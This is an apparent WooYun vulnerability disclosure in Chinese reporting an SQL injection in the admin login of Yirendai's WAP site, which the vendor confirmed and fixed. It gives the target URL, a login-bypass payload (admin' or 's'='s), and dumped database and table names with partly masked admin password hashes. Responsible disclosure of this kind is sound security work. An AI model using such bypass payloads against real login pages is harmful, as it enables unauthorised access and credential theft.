当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110037

漏洞标题:宜人贷某站SQL注入漏洞

相关厂商:宜人贷

漏洞作者: 小健客

提交时间:2015-04-24 07:40

修复时间:2015-04-27 19:06

公开时间:2015-04-27 19:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-24: 厂商已经确认,细节仅向厂商公开
2015-04-27: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

宜人贷确认漏洞的速度很快,rank给得也合理

详细说明:

wap.yirendai.com 这个站点后台登陆的地方存在sql注入,可绕过密码登陆后台。
http://wap.yirendai.com/yixin/index.php 用户名 admin' or 's'='s 密码随意

14.png


跑出点数据出来,证明一下:

available databases [2]:                                                       
[*] information_schema
[*] wapjingyingdai


Database: wapjingyingdai                                                       
[17 tables]
+----------------+
| admin          |
| channel        |
| channel_view   |
| consulting     |
| dic            |
| income         |
| phone_area     |
| qxs_admin      |
| qxs_channel    |
| qxs_consulting |
| qxs_views      |
| yrd_admin      |
| yrd_channel    |
| yrd_consulting |
| yrd_dic        |
| yrd_income     |
| yrd_views      |
+----------------+


Table: admin
[2 entries]
+----------+----------------------------------+
| username | password                         |
+----------+----------------------------------+
| admin    | 0d9ac792ea4********************* |
| adminnew | a82bddfc849********************* |
+----------+----------------------------------+

漏洞证明:

修复方案:

听说你们有自己的安全团队,他们知道

版权声明:转载请注明来源 小健客@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-24 10:58

厂商回复:

NICE FOUND 地址是用字典找到的么?礼物马上发送

最新状态:

2015-04-27:已修复。感谢。